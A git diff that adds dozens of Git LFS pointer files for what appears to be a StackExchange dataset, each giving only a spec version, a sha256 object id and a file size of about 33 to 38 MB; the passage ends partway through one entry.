--- /dev/null +++ b/data/stackexchange/1-1/1086_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a3d2efb08caee4f2e2784c92ab93582696fe66ab1ad177bc130600468e124d3a +size 38021122 diff --git a/data/stackexchange/1-1/1087_2289.jsonl b/data/stackexchange/1-1/1087_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f9ee99325f8a6133473c8086b34aa01d7d269975 --- /dev/null +++ b/data/stackexchange/1-1/1087_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1eb798b92729a8185535ad5e7626bff2fb8bc9ca22bb15134f86d11143edba62 +size 38475359 diff --git a/data/stackexchange/1-1/1088_2289.jsonl b/data/stackexchange/1-1/1088_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..035d61acba15abab378e39670cbdba77afe73f4d --- /dev/null +++ b/data/stackexchange/1-1/1088_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71eada4a03550b08e1f19760a8e7da6dd2e1c8bdaaede8ae92b3d22de74e4568 +size 37921251 diff --git a/data/stackexchange/1-1/1089_2289.jsonl b/data/stackexchange/1-1/1089_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dad0be550c6bb8c3d07802854ca7e473cbbcfc2c --- /dev/null +++ b/data/stackexchange/1-1/1089_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9bbededd88496d5f9243f9959bddfdc0af16bd4c9652fc690dd05152f4bb8028 +size 37991535 diff --git a/data/stackexchange/1-1/108_2289.jsonl b/data/stackexchange/1-1/108_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1df292c5a5702de27df62e7654cb396befbd42fb --- /dev/null +++ b/data/stackexchange/1-1/108_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8dd28f585fabfd4b91551326e59ea80a86a003d36b791c446030687682743a7c +size 33703827 diff --git a/data/stackexchange/1-1/1090_2289.jsonl b/data/stackexchange/1-1/1090_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c1292d0cfd88c958e6f6608f5b845ce91e9ae06f --- /dev/null +++ b/data/stackexchange/1-1/1090_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d4b3c356d093c39c34ec1c5f0c8e93d3f72dced5f2971edb4ef9419ee1f2398 +size 38060547 diff --git a/data/stackexchange/1-1/1091_2289.jsonl b/data/stackexchange/1-1/1091_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2e4b789ab254463fa495fd69ac8cabc0af65ddc8 --- /dev/null +++ b/data/stackexchange/1-1/1091_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:32b6caf88f477bab977fbb27108f66ab6ce9d3e7e6b7ae6c8b59a60dc7f6eacd +size 37888055 diff --git a/data/stackexchange/1-1/1092_2289.jsonl b/data/stackexchange/1-1/1092_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..08fa68a22c71c1e9be664c54d229fe7abe8390bf --- /dev/null +++ b/data/stackexchange/1-1/1092_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:03e0159be2c62513188079b8fb491a91392cfc284653463063d90d3bc18f9d6b +size 37809966 diff --git a/data/stackexchange/1-1/1093_2289.jsonl b/data/stackexchange/1-1/1093_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ff1698541e49e561a3536f40cec7973d57c4af80 --- /dev/null +++ b/data/stackexchange/1-1/1093_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4521227e7da7aaa2c641f226bc44d58cbb50785d7a13c3df6d9d4ad8c1c4cb31 +size 37338124 diff --git a/data/stackexchange/1-1/1094_2289.jsonl b/data/stackexchange/1-1/1094_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..08be56cbf1738d4205af3bc195000c14eaa6c628 --- /dev/null +++ b/data/stackexchange/1-1/1094_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4578ab82011dfe39ed8a7a150653cf08b9f09fecad311f575d6082956dd17283 +size 37517468 diff --git a/data/stackexchange/1-1/1095_2289.jsonl b/data/stackexchange/1-1/1095_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f6b1677c934a0a8c6b1f378ad9a030e7518729db --- /dev/null +++ b/data/stackexchange/1-1/1095_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6ceff746cdfd68dab8f12de02e3222d49aceb618fa57aa0e9be728144965fc76 +size 37752271 diff --git a/data/stackexchange/1-1/1096_2289.jsonl b/data/stackexchange/1-1/1096_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..484e20d9ebf24ab481dbfa6479aaa40d6900b96d --- /dev/null +++ b/data/stackexchange/1-1/1096_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4757d58b52d81a8fcadab7e4da4f0cdf99dd14d84dfeac0e9953cbf8a5d353e0 +size 37924514 diff --git a/data/stackexchange/1-1/1097_2289.jsonl b/data/stackexchange/1-1/1097_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1d4aa988eeda862866c352df1823159028dc1985 --- /dev/null +++ b/data/stackexchange/1-1/1097_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e71158218ec53669b5fa2f3d17a4999d9c0d8edd9458be1881403c0a9e9751bf +size 37782698 diff --git a/data/stackexchange/1-1/1098_2289.jsonl b/data/stackexchange/1-1/1098_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..406cdac111796e054f60119690ae3ac925b970cc --- /dev/null +++ b/data/stackexchange/1-1/1098_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a488cbb597a191b42215f3d237acc71594a7cca7525c008bae74057e12f42d6 +size 37582718 diff --git a/data/stackexchange/1-1/1099_2289.jsonl b/data/stackexchange/1-1/1099_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ef8304aa6d3d3436b874b4a332e8b5cfadd2c028 --- /dev/null +++ b/data/stackexchange/1-1/1099_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7540b11ddebecd549f84cb55bb085ac77b7dcd0c45e9b1b80f488b7b127d7aa6 +size 38003669 diff --git a/data/stackexchange/1-1/109_2289.jsonl b/data/stackexchange/1-1/109_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..440d9c1eaa4886d7548228ae0b1da792e5b91330 --- /dev/null +++ b/data/stackexchange/1-1/109_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7c4f959c2fdeea2b5839cbfca994be804250599c1fa0c955c505d28fe6811335 +size 33765849 diff --git a/data/stackexchange/1-1/10_2289.jsonl b/data/stackexchange/1-1/10_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a5a5aa69d3a08992d54e075297309948a3d8c20c --- /dev/null +++ b/data/stackexchange/1-1/10_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8febb84aafb749341c2fe2170a83c2a0683ce45098b5f7286af46c15db8705ae +size 35915407 diff --git a/data/stackexchange/1-1/1100_2289.jsonl b/data/stackexchange/1-1/1100_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3515e33e141099ee617e9cb2a9d0ef1104453f36 --- /dev/null +++ b/data/stackexchange/1-1/1100_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9e15bce82df8c2380e2034a43ae46536bbb30988b4f37484db6ddf87c4dad3d +size 35132340 diff --git a/data/stackexchange/1-1/1101_2289.jsonl b/data/stackexchange/1-1/1101_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ea4988873f8ba8aa045eca566c57238c8a338173 --- /dev/null +++ b/data/stackexchange/1-1/1101_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cc28f36abcff53ee99613435cf4c2650c912b888c3403e7e2c6a7de46f1ce8cd +size 35562029 diff --git a/data/stackexchange/1-1/1102_2289.jsonl b/data/stackexchange/1-1/1102_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0ffe7260fd62a2746613ce3617c9daf8d469e494 --- /dev/null +++ b/data/stackexchange/1-1/1102_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:35b97899e79e2aa9cd63e9f9716090618c11b2621bc9e0dfe908e4b63b3336e8 +size 35214132 diff --git a/data/stackexchange/1-1/1103_2289.jsonl b/data/stackexchange/1-1/1103_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..847484d2d7f25e8b92dbfe8259d28e08835c924e --- /dev/null +++ b/data/stackexchange/1-1/1103_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b34845edfb8d5a90951d66b183beaed580b35b7bdb7c302bc097ae7c4d23b00c +size 35585666 diff --git a/data/stackexchange/1-1/1104_2289.jsonl b/data/stackexchange/1-1/1104_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c92da825fe7cda4861b6249c547648cfcd8c8c13 --- /dev/null +++ b/data/stackexchange/1-1/1104_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fea94febdd2f95438bec00695e1cba2d135c78eeda6c8aa827ad3368293b0aa6 +size 34808257 diff --git a/data/stackexchange/1-1/1105_2289.jsonl b/data/stackexchange/1-1/1105_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b7194bb635ca5392e0f0116e0a5046920c5d59bd --- /dev/null +++ b/data/stackexchange/1-1/1105_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e2595f1c23eaff2bda6852edc176610db740fe3e767e75f59582ac2473979651 +size 35222500 diff --git a/data/stackexchange/1-1/1106_2289.jsonl b/data/stackexchange/1-1/1106_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3d97f17dc847fb1f3a1735093305e6446801a6f8 --- /dev/null +++ b/data/stackexchange/1-1/1106_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:0eb214d2cd8da03af88df45b169e697d2ab06d7e92b686401275bd90f811b61b +size 35458298 diff --git a/data/stackexchange/1-1/1107_2289.jsonl b/data/stackexchange/1-1/1107_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6532863663ed95d1c40b6108cecaa210cc275818 --- /dev/null +++ b/data/stackexchange/1-1/1107_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e99224e586ef0cbf315cc59e6e6ea901e31f5396a22378a509d7c9a875c53ba2 +size 35521334 diff --git a/data/stackexchange/1-1/1108_2289.jsonl b/data/stackexchange/1-1/1108_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b3461b4c736aadf4943633e73504982f7e6c47b2 --- /dev/null +++ b/data/stackexchange/1-1/1108_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:88913c11e5c81f27f6cd0d9fc070a2c29096a0c9425e6e58d18cbfe1bf4089f0 +size 35846625 diff --git a/data/stackexchange/1-1/1109_2289.jsonl b/data/stackexchange/1-1/1109_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4f8a05e3cbfa446045ec3a1f74882d65a619f246 --- /dev/null +++ b/data/stackexchange/1-1/1109_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a178dd9d24f9699c893602ffc078e8e2d4c9f13695abedf38d318e68cac3b142 +size 36131100 diff --git a/data/stackexchange/1-1/110_2289.jsonl b/data/stackexchange/1-1/110_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..65c232b74106b723ca3b12481ea14cffc8a90c3c --- /dev/null +++ b/data/stackexchange/1-1/110_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:499227dcdaba28562e8dea269e7be6b90909b638382e11bbc985db9eb84a69e0 +size 33523528 diff --git a/data/stackexchange/1-1/1110_2289.jsonl b/data/stackexchange/1-1/1110_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..874b9fef1c38715c5a7072de51a24c957dd332e9 --- /dev/null +++ b/data/stackexchange/1-1/1110_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d38d4ad3090ef84a2efe5c9967358372a8d8c60a0cf309619fb1e5b2a188a39e +size 34741005 diff --git a/data/stackexchange/1-1/1111_2289.jsonl b/data/stackexchange/1-1/1111_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d70d0357df8720c3848b9452aaff14af90ce8ad1 --- /dev/null +++ b/data/stackexchange/1-1/1111_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1802d75c87652074b0e2c8d15699b018e703d617d39704239d7f296e5e84e171 +size 35586791 diff --git a/data/stackexchange/1-1/1112_2289.jsonl b/data/stackexchange/1-1/1112_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..227aea63008fb789c8c3b41d73e4363b1a4592ca --- /dev/null +++ b/data/stackexchange/1-1/1112_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b201b986bd2167eedd9fe5ecc84bc02f5bbead97431fe94d54f9c97b03d3ab3 +size 35341515 diff --git a/data/stackexchange/1-1/1113_2289.jsonl b/data/stackexchange/1-1/1113_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c710d99a44835627adaab7cf5a9732a2a4d392fa --- /dev/null +++ b/data/stackexchange/1-1/1113_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a013e866ad36dd40d7de6c48c2e442be14c83bf2caee7319acd6b40e8f6a6e43 +size 34779237 diff --git a/data/stackexchange/1-1/1114_2289.jsonl b/data/stackexchange/1-1/1114_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..3c8c8aa9db7552c28568648c78fe9c5854d59951 --- /dev/null +++ b/data/stackexchange/1-1/1114_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:abd5796041818d2cd6a55c1c2525c9b08e74e9e54d2ce52fbe3c019b686304f2 +size 35573597 diff --git a/data/stackexchange/1-1/1115_2289.jsonl b/data/stackexchange/1-1/1115_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3f57d0fe53d50e55c8ba3ca8f837dd791f2aaacb --- /dev/null +++ b/data/stackexchange/1-1/1115_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dd611c098d8e106d60d0178b5225c06eeaab19a52b2cfe4830bddaa79d711a67 +size 35327859 diff --git a/data/stackexchange/1-1/1116_2289.jsonl b/data/stackexchange/1-1/1116_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b9abb44993353d353d57fe511b36325a8a2c562d --- /dev/null +++ b/data/stackexchange/1-1/1116_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1956cfec0b3bce1a66eea727ea411ba68e8dce00c0b010fab3f64073addedc71 +size 35153791 diff --git a/data/stackexchange/1-1/1117_2289.jsonl b/data/stackexchange/1-1/1117_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d76cc4eb51259b58f1e59dc5720dc4e78213092c --- /dev/null +++ b/data/stackexchange/1-1/1117_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0a9293ce25dba74db829b37891138f60bc47d3fdd26b7bed4d1baaf97556cfc1 +size 35683970 diff --git a/data/stackexchange/1-1/1118_2289.jsonl b/data/stackexchange/1-1/1118_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f4df3184e093c74e40b77887d77d715a3da6a337 --- /dev/null +++ b/data/stackexchange/1-1/1118_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:971b2d69e20945c7602d30c7d4c6efa2a442b473d65ee82d5f0462e84f0b41ea +size 35417891 diff --git a/data/stackexchange/1-1/1119_2289.jsonl b/data/stackexchange/1-1/1119_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..41cc6a19cf01de587700ea870012ac1bb4a73fb8 --- /dev/null +++ b/data/stackexchange/1-1/1119_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:845f89943c3f3bf61f6ee2500868aa183a84856de8139df03a1ff442c964b4ad +size 34422259 diff --git a/data/stackexchange/1-1/111_2289.jsonl b/data/stackexchange/1-1/111_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3e92433e6f18e870cf75e238ffcecf35ca23d775 --- /dev/null +++ b/data/stackexchange/1-1/111_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e1c213bb14e522fd296415e691980c63dbd6a1d69dc4c9e49eafae7e3cc2ccbe +size 33839256 diff --git a/data/stackexchange/1-1/1120_2289.jsonl b/data/stackexchange/1-1/1120_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d266963598f3d12d074303c4b0928dc10661fcb1 --- /dev/null +++ b/data/stackexchange/1-1/1120_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:74f5c10bd8ca5feb04b80d9d5209a78de4467f11cc953c4474757748aa956f7a +size 35131751 diff --git a/data/stackexchange/1-1/1121_2289.jsonl b/data/stackexchange/1-1/1121_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e039a4ee7749feddc5f17fce9ad5ac135cde6390 --- /dev/null +++ b/data/stackexchange/1-1/1121_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:0e66a99cf89f4357ef62ff118acde9afe1354abbc46eebfac93724ff4c18a03d +size 35898169 diff --git a/data/stackexchange/1-1/1122_2289.jsonl b/data/stackexchange/1-1/1122_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c109de3f3e466aa23dfc5ba15873972783516474 --- /dev/null +++ b/data/stackexchange/1-1/1122_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8388a3e06ee8403f60200c0a44856da08626c9bfc4a2090b0bc336f691dffe6 +size 35070435 diff --git a/data/stackexchange/1-1/1123_2289.jsonl b/data/stackexchange/1-1/1123_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aec5c05b7caa90cf69fb04d3d487c798b49f5c5b --- /dev/null +++ b/data/stackexchange/1-1/1123_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c88409f218c0321e5c23989498641f05db39cf706c731a64724938307f7154e5 +size 34544361 diff --git a/data/stackexchange/1-1/1124_2289.jsonl b/data/stackexchange/1-1/1124_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..31bc16e182436c97d499047b700226a331ecf95b --- /dev/null +++ b/data/stackexchange/1-1/1124_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2744321bc5905b2fd369e857e7d58e3eabc56c1a0034b3235f07aac99f1640c9 +size 35130990 diff --git a/data/stackexchange/1-1/1125_2289.jsonl b/data/stackexchange/1-1/1125_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..95b92758db5277d7f5c80a98f5147fcf8fcb03e4 --- /dev/null +++ b/data/stackexchange/1-1/1125_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e87d026f1b2c84abb3eeb546e1fe73ab0f5288b3f81c158778292e1b59a2ec8f +size 35463469 diff --git a/data/stackexchange/1-1/1126_2289.jsonl b/data/stackexchange/1-1/1126_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7bb402bec1ebfd25eec7a4590302f3bff2dafa09 --- /dev/null +++ b/data/stackexchange/1-1/1126_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b8ed0df8f56a29b49534dc5ded9c97ae22b1524fbe62328179ec04f97128a5eb +size 35148487 diff --git a/data/stackexchange/1-1/1127_2289.jsonl b/data/stackexchange/1-1/1127_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d0c2217258e3d32aa1a121c1eb4db7a4a6518c02 --- /dev/null +++ b/data/stackexchange/1-1/1127_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c48303e3d1d50cbab7b8f6307661aa44cfccd0d675343e275d1f7e013af6269a +size 35542559 diff --git a/data/stackexchange/1-1/1128_2289.jsonl b/data/stackexchange/1-1/1128_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..91191e5c8cbe1057f44bda8d771315d896c5fce8 --- /dev/null +++ b/data/stackexchange/1-1/1128_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:729bd9edfb2568df1c53b4ed6d56efe13443558bc3d1ac12cd215070d7067c69 +size 35515247 diff --git a/data/stackexchange/1-1/1129_2289.jsonl b/data/stackexchange/1-1/1129_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c3f80bb33e6696e9984b4aaa0dfa51c81e3b1387 --- /dev/null +++ b/data/stackexchange/1-1/1129_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ac6c40aa5332619daf8054b6eb4e67164918e12857c0e8cee8410708156b5235 +size 35749589 diff --git a/data/stackexchange/1-1/112_2289.jsonl b/data/stackexchange/1-1/112_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..933912d9f59706f11c6abada7c013d074513b335 --- /dev/null +++ b/data/stackexchange/1-1/112_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:651e0e290c443758f4bff31ab8d66226225b6a4b9c1e835b7663cba642f9b977 +size 33737609 diff --git a/data/stackexchange/1-1/1130_2289.jsonl b/data/stackexchange/1-1/1130_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f8a05c4151532f698e1f8c56b27912200ce5303a --- /dev/null +++ b/data/stackexchange/1-1/1130_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bd047339e2c508cf6a9f2b0173bddeb6436da24869f1373997ac1574071e1a3f +size 35020881 diff --git a/data/stackexchange/1-1/1131_2289.jsonl b/data/stackexchange/1-1/1131_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c832e73cff4adfb73843f87c093f6c18cd873753 --- /dev/null +++ b/data/stackexchange/1-1/1131_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8312c3aae3f3d573579d344bc9ce56824146cf7eb0c3593e483919ba206839e8 +size 35256101 diff --git a/data/stackexchange/1-1/1132_2289.jsonl b/data/stackexchange/1-1/1132_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c33412541be053d0ef6552e821298aeede6982aa --- /dev/null +++ b/data/stackexchange/1-1/1132_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:369621c291d06ed84564b16720a560209e9ecdb918afc82f6fa160bef06bc4af +size 35349881 diff --git a/data/stackexchange/1-1/1133_2289.jsonl b/data/stackexchange/1-1/1133_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..14500e331e41913f3f6e6056eeae3d4db2a3ac3c --- /dev/null +++ b/data/stackexchange/1-1/1133_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bd1699e34b063d82bd40cca164cc4a9e434cf08f7dbf2d8cb7e6533bd2a48655 +size 35496910 diff --git a/data/stackexchange/1-1/1134_2289.jsonl b/data/stackexchange/1-1/1134_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..20bf812f2852d91609e1d5b37b54a7429c9fa380 --- /dev/null +++ b/data/stackexchange/1-1/1134_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80626d95a9dbc9744253b99fa3c4d05edf537a56dd65d086e0579320af4557e4 +size 35283112 diff --git a/data/stackexchange/1-1/1135_2289.jsonl b/data/stackexchange/1-1/1135_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6899af0f8dcf4cf91c904d8cb2bc866d6d1024d6 --- /dev/null +++ b/data/stackexchange/1-1/1135_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:63fc0654795a2e2e03b9cd631224957f5df5dcb284e13a93695a9fda78d7781c +size 34682188 diff --git a/data/stackexchange/1-1/1136_2289.jsonl b/data/stackexchange/1-1/1136_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e6552574d6aeeb2f9415dd9ff8ae171bb958797b --- /dev/null +++ b/data/stackexchange/1-1/1136_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:12b5086066f8aac12d149bee5d3f60f891620d536a1b211483314716eb5d26ce +size 35040935 diff --git a/data/stackexchange/1-1/1137_2289.jsonl b/data/stackexchange/1-1/1137_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4910dba4d895b48c2edd7946e3afa4dc451b6a6f --- /dev/null +++ b/data/stackexchange/1-1/1137_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:fb2dadd4c9e68944118b5efd3a12a951a316b3194183fdb78c9a01e9830aeb4b +size 35017879 diff --git a/data/stackexchange/1-1/1138_2289.jsonl b/data/stackexchange/1-1/1138_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..10e107bf4552ddc5eede7e1e34aa8c35f22e6e30 --- /dev/null +++ b/data/stackexchange/1-1/1138_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:44a32a06e3e02730d374959a77ff1cee52cc0448019246c574a1d06042ddd098 +size 35009475 diff --git a/data/stackexchange/1-1/1139_2289.jsonl b/data/stackexchange/1-1/1139_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8eee5053a22f337101c1178cd3e25482d9686873 --- /dev/null +++ b/data/stackexchange/1-1/1139_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c31df17e7bc0cd987ef97cc443eb1bcb23789e089326b8500ac22c92fff767b9 +size 33006335 diff --git a/data/stackexchange/1-1/113_2289.jsonl b/data/stackexchange/1-1/113_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7c170380a04838d690b6a92dff21ad942bb0b218 --- /dev/null +++ b/data/stackexchange/1-1/113_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c8c580633335e2bc4dc0f3f47ae848e8397a6ab3936fd121e54cacc3b96e5451 +size 33878006 diff --git a/data/stackexchange/1-1/1140_2289.jsonl b/data/stackexchange/1-1/1140_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..42cf20a694467d6e6a61458563f40c42b7c5dcfa --- /dev/null +++ b/data/stackexchange/1-1/1140_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4f0edb71bc5312a450e38fd93c1f2eda17ef5bdb0817e05b668513b6a1a60603 +size 32535930 diff --git a/data/stackexchange/1-1/1141_2289.jsonl b/data/stackexchange/1-1/1141_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..855c5df0544fe48b2bc8df43701cd38c36875d82 --- /dev/null +++ b/data/stackexchange/1-1/1141_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7750330a9bbde84d603a9e48b5635a89f4d7c86bc289762e03310055203d1b07 +size 33117503 diff --git a/data/stackexchange/1-1/1142_2289.jsonl b/data/stackexchange/1-1/1142_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..94b0b3d68f37827dc38ab2f02b54a6acce2e7460 --- /dev/null +++ b/data/stackexchange/1-1/1142_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:31ce5bc8656d99d40cd86e981f37a958f52f3964f7ea715ba5895480fa3583c8 +size 33310743 diff --git a/data/stackexchange/1-1/1143_2289.jsonl b/data/stackexchange/1-1/1143_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4b765ae68796ea152bc2f6cf1b3d5436d8c1576c --- /dev/null +++ b/data/stackexchange/1-1/1143_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9fa28790a73462c4fcfafedd084468cbfe09dd8ea46407835eb02c22b621a916 +size 33056654 diff --git a/data/stackexchange/1-1/1144_2289.jsonl b/data/stackexchange/1-1/1144_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a24db4acc213fdd70ccf14e9042b6cf7d84554b4 --- /dev/null +++ b/data/stackexchange/1-1/1144_2289.jsonl @@ 